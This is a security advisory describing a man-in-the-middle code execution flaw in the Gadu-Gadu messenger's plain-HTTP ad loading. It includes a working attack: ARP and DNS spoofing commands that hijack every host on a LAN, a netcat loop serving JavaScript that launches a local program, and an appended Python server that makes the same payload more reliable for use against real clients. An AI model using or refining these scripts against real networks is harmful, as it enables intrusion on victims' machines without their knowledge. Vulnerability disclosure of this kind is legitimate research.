Gadu-Gadu Remote Code Execution

Published: 28 May 2011
Reported by: Kacper Szczesniak
Type: packetstorm
Source: packetstormsecurity.com

The Gadu-Gadu client loads its ad JavaScript over plain HTTP, so a man-in-the-middle attacker on the same network can inject JavaScript into the client's WebKit user interface and spawn new processes on the victim host without any user interaction.

Code

Vendor: Gadu-Gadu (http://gadu-gadu.pl)
Vulnerable Version: All
Vulnerability Type: MITM, Remote Code Execution
Risk level: High
Credit: Kacper Szczesniak <[email protected]>

Vulnerability Details:

Gadu-Gadu is vulnerable to a man-in-the-middle attack that allows remote code execution on the victim host. The client loads JavaScript from an external HTTP location to display ads (the PoC below spoofs the *.adocean.pl names). An attacker who can intercept that unauthenticated HTTP request can substitute JavaScript that runs inside the client's WebKit user interface, and the client's internal communication mechanisms can then be used to spawn new processes: the PoC inserts an <a> element whose href is a local executable path and dispatches a synthetic click on it. No user interaction and no presence on the victim's contact list is needed, because the ads are loaded automatically.

A trivial PoC to spawn notepads all over CoffeeHeaven/LAN. Run as root on a host in the victims' LAN; GW_IP and GW_MAC are the gateway's IP and MAC address, YOURIP is the attacker's address. arpspoof and dnsspoof stay in the foreground, so they are backgrounded here (or run them in separate terminals):

```sh
# Forward the victims' traffic so the LAN keeps working while we sit in the middle.
echo 1 > /proc/sys/net/ipv4/ip_forward
# Pin the real gateway MAC so our own ARP cache is not poisoned by the spoofing.
arp -s GW_IP GW_MAC
# No -t target: poison every host on the LAN into sending gateway-bound traffic here.
arpspoof -i eth0 GW_IP &
# Answer DNS queries for the ad network with the attacker's address.
echo "YOURIP *.adocean.pl" > /tmp/x
dnsspoof -i eth0 -f /tmp/x &
# Answer every HTTP request with the injected script. Content-Length: 239 is the exact
# byte count of the body; keep it in sync if the payload changes. Traditional netcat
# builds need `nc -l -p 80` instead of `nc -l 80`.
while [ 1 ] ; do echo -ne "HTTP/1.0 200 OK\r\nConnection: close\r\nContent-Length: 239\r\nContent-Type: text/html\r\n\r\nb=document.getElementsByTagName(\"body\").item(0);\r\nb.innerHTML='<a id=\"a\" href=\"c:/windows/notepad.exe\"></a>';\r\na=document.getElementById('a');\r\ne=document.createEvent('HTMLEvents');\r\ne.initEvent('click', true, true);\r\na.dispatchEvent(e);\r\n" | nc -l 80 ; done
```

BTW, the last vulnerability was not really patched. Only a message filter was introduced, so it's still possible to take advantage of it using another MITM.

kacper
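The `nc` loop in the PoC hard-codes `Content-Length: 239`, which has to match the body byte for byte or a strict client may truncate or stall on the response. The following is an added example, not the advisory's code and not anything from Gadu-Gadu: a small Python HTTP server that serves the same injected script in the advisory's HTTP/1.0 response shape but computes the length from the body, plus a checker that verifies the declared length against the body it actually carries. The payload and headers are taken from the advisory; the bind address and port 80 are assumptions, and it is meant to sit behind the dnsspoof'd *.adocean.pl name exactly as the nc loop does.

```python
#!/usr/bin/env python3
"""Replacement for the advisory's `while ...; nc -l 80; done` loop.

Added example, not the advisory's or Gadu-Gadu's code. Answers every HTTP
request on the spoofed ad host with the advisory's JavaScript payload and a
Content-Length computed from the body rather than hand-counted.
"""
from http.server import BaseHTTPRequestHandler, HTTPServer

# Payload from the advisory: insert an <a> whose href is a local executable and
# fire a synthetic click so the embedded WebKit UI follows it. CRLF line ends,
# exactly as in the original echo -ne string.
PAYLOAD = (
    'b=document.getElementsByTagName("body").item(0);\r\n'
    "b.innerHTML='<a id=\"a\" href=\"c:/windows/notepad.exe\"></a>';\r\n"
    "a=document.getElementById('a');\r\n"
    "e=document.createEvent('HTMLEvents');\r\n"
    "e.initEvent('click', true, true);\r\n"
    "a.dispatchEvent(e);\r\n"
)


def build_response(body: str) -> bytes:
    """HTTP/1.0 response with the same headers the advisory's loop sends."""
    data = body.encode("ascii")
    head = (
        "HTTP/1.0 200 OK\r\n"
        "Connection: close\r\n"
        f"Content-Length: {len(data)}\r\n"
        "Content-Type: text/html\r\n"
        "\r\n"
    )
    return head.encode("ascii") + data


def check_response(raw: bytes) -> bool:
    """Return True only if the declared Content-Length equals the body length."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        return False  # no header/body separator at all
    declared = None
    for line in head.split(b"\r\n")[1:]:  # skip the status line
        name, _, value = line.partition(b":")
        if name.strip().lower() == b"content-length":
            declared = int(value.strip())
    return declared is not None and declared == len(body)


class AdHandler(BaseHTTPRequestHandler):
    """Serve the payload for any path; log which ad URL the client asked for."""
    protocol_version = "HTTP/1.0"

    def do_GET(self):
        self.log_message("client %s requested %s", self.client_address[0], self.path)
        self.wfile.write(build_response(PAYLOAD))
        self.close_connection = True

    do_POST = do_GET


if __name__ == "__main__":
    # Assumption: bind all interfaces on port 80 (needs root or CAP_NET_BIND_SERVICE).
    HTTPServer(("0.0.0.0", 80), AdHandler).serve_forever()
```

`check_response` is also a quick way to validate the hand-built nc response from the advisory: pipe the same `echo -ne` string into a file and feed the bytes to it before pointing real clients at the host.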
